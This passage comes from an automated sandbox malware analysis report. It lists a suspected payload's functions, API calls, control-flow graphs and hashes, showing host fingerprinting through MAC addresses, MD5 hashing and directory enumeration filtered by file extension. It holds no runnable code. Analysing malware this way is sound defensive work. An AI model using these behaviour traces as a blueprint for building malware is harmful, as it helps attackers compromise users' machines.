                                                                                                                            • _memset.LIBCMT ref: 00E410CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E410DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E410F0
                                                                                                                            • _malloc.LIBCMT ref: 00E41100
                                                                                                                            • _memset.LIBCMT ref: 00E4110B
                                                                                                                            • _sprintf.LIBCMT ref: 00E4112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00E4113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00E41154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E4115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 195f295856dd1e18212c8c2725cffb19731845addb0a4e5eb9b9fefb1643d92e
                                                                                                                            • Instruction ID: 6f9007e78f5a8d6ea40817d17772fbbe4fb97d622646531f5a5180f26f4cb852
                                                                                                                            • Opcode Fuzzy Hash: 195f295856dd1e18212c8c2725cffb19731845addb0a4e5eb9b9fefb1643d92e
                                                                                                                            • Instruction Fuzzy Hash: 68519071D40219ABDF11DBA0DD46FEFBBB8EB04754F200025FA01B6180EB75AA058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E41AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41ACA
                                                                                                                              • Part of subcall function 00E41AB0: DispatchMessageW.USER32(?), ref: 00E41AE0
                                                                                                                              • Part of subcall function 00E41AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00E3F900
                                                                                                                            • _memmove.LIBCMT ref: 00E3F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00E3FA51
                                                                                                                            • _memmove.LIBCMT ref: 00E3FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 4fce4c88232433783588d2ab034b6b584b9a930a9ce07f1d64c9f520685a7665
                                                                                                                            • Instruction ID: c74bc96d4b34e552105705b15a4870b34f14ebb69d5c9ad35c2397cd138422f9
                                                                                                                            • Opcode Fuzzy Hash: 4fce4c88232433783588d2ab034b6b584b9a930a9ce07f1d64c9f520685a7665
                                                                                                                            • Instruction Fuzzy Hash: CE527C71D00208DBDF14DFA8D889BDEBBF5BF04308F209569E819B7251E775AA48CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1515 e3e870-e3e8d6 call e456d0 CryptAcquireContextW 1518 e3e8e9-e3e901 CryptCreateHash 1515->1518 1519 e3e8d8-e3e8e4 call e60eca 1515->1519 1521 e3e903-e3e90f call e60eca 1518->1521 1522 e3e914-e3e930 CryptHashData 1518->1522 1519->1518 1521->1522 1524 e3e943-e3e961 CryptGetHashParam 1522->1524 1525 e3e932-e3e93e call e60eca 1522->1525 1527 e3e963-e3e96f call e60eca 1524->1527 1528 e3e974-e3e9a6 call e50be4 call e5b420 CryptGetHashParam 1524->1528 1525->1524 1527->1528 1534 e3e9b9-e3e9bb 1528->1534 1535 e3e9a8-e3e9b4 call e60eca 1528->1535 1537 e3e9c0-e3e9c3 1534->1537 1535->1534 1538 e3ea10-e3ea31 call e52110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 e3e9c5-e3e9df call e504a6 1537->1539 1544 e3ea33-e3ea3b call e52587 1538->1544 1545 e3ea3e-e3ea50 1538->1545 1546 e3e9f2-e3e9f5 1539->1546 1547 e3e9e1-e3e9f0 call e43ea0 1539->1547 1544->1545 1548 e3e9f8-e3e9fd 1546->1548 1547->1537 1548->1548 1551 e3e9ff-e3ea0e call e43ea0 1548->1551 1551->1537
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F2FCA4,00000000,00000000), ref: 00E3E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E8E4
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E3E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00E3E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E3E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E96F
                                                                                                                            • _memset.LIBCMT ref: 00E3E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E3E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 00E3E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 6c77d3a99924bdc09836b80646e5daa72205c5d3e5c470e4b1b47a05c13f7ad2
                                                                                                                            • Instruction ID: 9cf40764fe0aab6f004ee9dd8fccc8e878b951d75fb054b3ffb0a6b7aaddead5
                                                                                                                            • Opcode Fuzzy Hash: 6c77d3a99924bdc09836b80646e5daa72205c5d3e5c470e4b1b47a05c13f7ad2
                                                                                                                            • Instruction Fuzzy Hash: C6517E71D40209AADF11DFA0DD46FEEBBB8EB44744F205429F901B6281EB75AA05CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1556 e3eaa0-e3eb09 call e456d0 CryptAcquireContextW 1559 e3eb0b-e3eb17 call e60eca 1556->1559 1560 e3eb1c-e3eb34 CryptCreateHash 1556->1560 1559->1560 1562 e3eb47-e3eb56 CryptHashData 1560->1562 1563 e3eb36-e3eb42 call e60eca 1560->1563 1565 e3eb69-e3eb87 CryptGetHashParam 1562->1565 1566 e3eb58-e3eb64 call e60eca 1562->1566 1563->1562 1567 e3eb9a-e3ebcc call e50be4 call e5b420 CryptGetHashParam 1565->1567 1568 e3eb89-e3eb95 call e60eca 1565->1568 1566->1565 1575 e3ebdf 1567->1575 1576 e3ebce-e3ebda call e60eca 1567->1576 1568->1567 1578 e3ebe1-e3ebe4 1575->1578 1576->1575 1579 e3ebe6-e3ec00 call e504a6 1578->1579 1580 e3ec38-e3ec67 call e52110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 e3ec13-e3ec19 1579->1585 1586 e3ec02-e3ec11 call e43ea0 1579->1586 1588 e3ec20-e3ec25 1585->1588 1586->1578 1588->1588 1590 e3ec27-e3ec36 call e43ea0 1588->1590 1590->1578
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F2FCA4,00000000,00000000,00000000,?), ref: 00E3EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB17
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E3EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00E3EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E3EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB95
                                                                                                                            • _memset.LIBCMT ref: 00E3EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E3EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 00E3EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00E3EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E3EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: ae92682d5a3be0d614144fa5bb9622e816cf1dc51ecfa5971b8e74984772e9a3
                                                                                                                            • Instruction ID: 3250f2ba1b2318b738636712bead2f93d23b4c5e4dc991d9ddb11b408a43f232
                                                                                                                            • Opcode Fuzzy Hash: ae92682d5a3be0d614144fa5bb9622e816cf1dc51ecfa5971b8e74984772e9a3
                                                                                                                            • Instruction Fuzzy Hash: 6A51A371D40219ABDF11DBA0DD46FEFBBB8EB44754F201425F901B6280DB75AA05CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1593 e3e670-e3e697 call e50c62 * 2 1598 e3e6b4-e3e6c2 GetAdaptersInfo 1593->1598 1599 e3e699-e3e6b3 call e51f2d call e50bed 1593->1599 1601 e3e6c4-e3e6d9 call e50bed call e50c62 1598->1601 1602 e3e6db-e3e6e8 GetAdaptersInfo 1598->1602 1601->1599 1601->1602 1605 e3e744-e3e754 call e50bed 1602->1605 1606 e3e6ea-e3e73c call e504a6 call e51f2d * 2 1602->1606 1619 e3e741 1606->1619 1619->1605
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E3E67F
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _malloc.LIBCMT ref: 00E3E68B
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E69E
                                                                                                                            • _free.LIBCMT ref: 00E3E6A4
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E3E6B9
                                                                                                                            • _free.LIBCMT ref: 00E3E6C5
                                                                                                                            • _malloc.LIBCMT ref: 00E3E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E3E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 00E3E720
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E732
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E73C
                                                                                                                            • _free.LIBCMT ref: 00E3E745
                                                                                                                            Strings
                                                                                                                            • Address: %s, mac: %s, xrefs: 00E3E72D
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00E3E71A
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00E3E699
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: d65e4a4880837a76c70cdfcbe93605f6c3d5bba9891eaeb0c9ad9be9033d9ee0
                                                                                                                            • Instruction ID: 3d01832964c692b7679718ede17faec40f01c246b1b0802a603daa6e29e7b6b5
                                                                                                                            • Opcode Fuzzy Hash: d65e4a4880837a76c70cdfcbe93605f6c3d5bba9891eaeb0c9ad9be9033d9ee0
                                                                                                                            • Instruction Fuzzy Hash: 6A110AB25046647AC26163B55C16FFF7BDC8F46713F0405A5FE98F1241EA589A08A3B2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1997 e3fb98-e3fb9f 1998 e3fba0-e3fbb9 1997->1998 1998->1998 1999 e3fbbb-e3fbcf 1998->1999 2000 e3fbd3-e3fc02 PathAppendW call e48400 1999->2000 2001 e3fbd1 1999->2001 2004 e3fc04-e3fc0c call e52587 2000->2004 2005 e3fc0f-e3fc29 2000->2005 2001->2000 2004->2005 2007 e3fc2b-e3fc2f 2005->2007 2008 e3fc49-e3fc4c 2005->2008 2010 e3fc31-e3fc47 call e505a0 2007->2010 2011 e3fc4f-e3fc6b PathFileExistsW 2007->2011 2008->2011 2010->2011 2013 e3fcdf-e3fce5 2011->2013 2014 e3fc6d-e3fc86 call e50c62 2011->2014 2016 e3fcf0-e3fd07 call e47140 2013->2016 2017 e3fce7-e3fced call e52587 2013->2017 2024 e3fc8a-e3fc9f lstrcpyW 2014->2024 2025 e3fc88 2014->2025 2026 e3fd0b-e3fd20 FindFirstFileW 2016->2026 2027 e3fd09 2016->2027 2017->2016 2028 e3fca3-e3fcdc lstrcatW call e44690 call e3f0e0 call e50bed 2024->2028 2029 e3fca1 2024->2029 2025->2024 2030 e3fd22-e3fd2d call e52587 2026->2030 2031 e3fd30-e3fd4c 2026->2031 2027->2026 2028->2013 2029->2028 2030->2031 2035 e3fd52-e3fd55 2031->2035 2036 e40072-e40076 2031->2036 2039 e3fd60-e3fd6b 2035->2039 2040 e40086-e400a4 2036->2040 2041 e40078-e40083 call e52587 2036->2041 2045 e3fd70-e3fd76 2039->2045 2042 e400a6-e400ae call e52587 2040->2042 2043 e400b1-e400c9 2040->2043 2041->2040 2042->2043 2050 e400d6-e400ee 2043->2050 2051 e400cb-e400d3 call e52587 2043->2051 2052 e3fd96-e3fd98 2045->2052 2053 e3fd78-e3fd7b 2045->2053 2063 e400f0-e400f8 call e52587 2050->2063 2064 e400fb-e4010b 2050->2064 2051->2050 2060 e3fd9b-e3fd9d 2052->2060 2057 e3fd92-e3fd94 2053->2057 2058 e3fd7d-e3fd85 2053->2058 2057->2060 2058->2052 2062 e3fd87-e3fd90 2058->2062 2065 e3fda3-e3fdae 2060->2065 2066 e40052-e40065 FindNextFileW 2060->2066 2062->2045 2062->2057 2063->2064 2069 e3fdb0-e3fdb6 2065->2069 2066->2039 2068 e4006b-e4006c FindClose 2066->2068 2068->2036 2071 e3fdd6-e3fdd8 2069->2071 2072 e3fdb8-e3fdbb 2069->2072 2075 e3fddb-e3fddd 2071->2075 2073 e3fdd2-e3fdd4 2072->2073 2074 e3fdbd-e3fdc5 2072->2074 2073->2075 2074->2071 2076 e3fdc7-e3fdd0 2074->2076 2075->2066 2077 e3fde3-e3fdea 2075->2077 2076->2069 2076->2073 2078 e3fec2-e3fecc 2077->2078 2079 e3fdf0-e3fe71 call e47140 call e45ae0 call e44690 call e43b70 2077->2079 2080 e3feda-e3fede 2078->2080 2081 e3fece-e3fed5 call e41ab0 2078->2081 2103 e3fe73-e3fe7e call e52587 2079->2103 2104 e3fe81-e3fea9 2079->2104 2080->2066 2085 e3fee4-e3ff13 call e44690 2080->2085 2081->2080 2091 e3ff15-e3ff17 2085->2091 2092 e3ff19-e3ff1f 2085->2092 2094 e3ff31-e3ff6a call e45ae0 PathFindExtensionW 2091->2094 2095 e3ff22-e3ff2b 2092->2095 2101 e3ff9a-e3ffa8 2094->2101 2102 e3ff6c 2094->2102 2095->2095 2096 e3ff2d-e3ff2f 2095->2096 2096->2094 2105 e3ffda-e3ffde 2101->2105 2106 e3ffaa 2101->2106 2109 e3ff70-e3ff74 2102->2109 2103->2104 2104->2066 2108 e3feaf-e3febd call e52587 2104->2108 2115 e3ffe0-e3ffe9 2105->2115 2116 e4003a-e40042 2105->2116 2110 e3ffb0-e3ffb4 2106->2110 2108->2066 2113 e3ff76-e3ff78 2109->2113 2114 e3ff7a 2109->2114 2117 e3ffb6-e3ffb8 2110->2117 2118 e3ffba 2110->2118 2120 e3ff7c-e3ff88 call e51c02 2113->2120 2114->2120 2123 e3ffeb 2115->2123 2124 e3ffed-e3fff9 call e51c02 2115->2124 2121 e40044-e4004c call e52587 2116->2121 2122 e4004f 2116->2122 2125 e3ffbc-e3ffce call e51c02 2117->2125 2118->2125 2134 e3ff93 2120->2134 2135 e3ff8a-e3ff8f 2120->2135 2121->2122 2122->2066 2123->2124 2124->2116 2136 e3fffb-e4000b 2124->2136 2125->2116 2139 e3ffd0-e3ffd5 2125->2139 2141 e3ff97 2134->2141 2135->2109 2140 e3ff91 2135->2140 2137 e4000d 2136->2137 2138 e4000f-e40026 call e51c02 2136->2138 2137->2138 2138->2116 2145 e40028-e40035 call e411c0 2138->2145 2139->2110 2143 e3ffd7 2139->2143 2140->2141 2141->2101 2143->2105 2145->2116
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: 15861775f9850bbd48382c31b17c13e41f9f1ab55ca70dab8054cb2c95abc24f
                                                                                                                            • Instruction ID: 3929b43e09db9fd0387b8148d89e0b284ca45b301257153d3834aaceec9a5f41
                                                                                                                            • Opcode Fuzzy Hash: 15861775f9850bbd48382c31b17c13e41f9f1ab55ca70dab8054cb2c95abc24f
                                                                                                                            • Instruction Fuzzy Hash: 4AB17E70D00209DADF20DFA4D849BEEBBB5FF15308F605469E409BB251E7319A49CF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E41CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
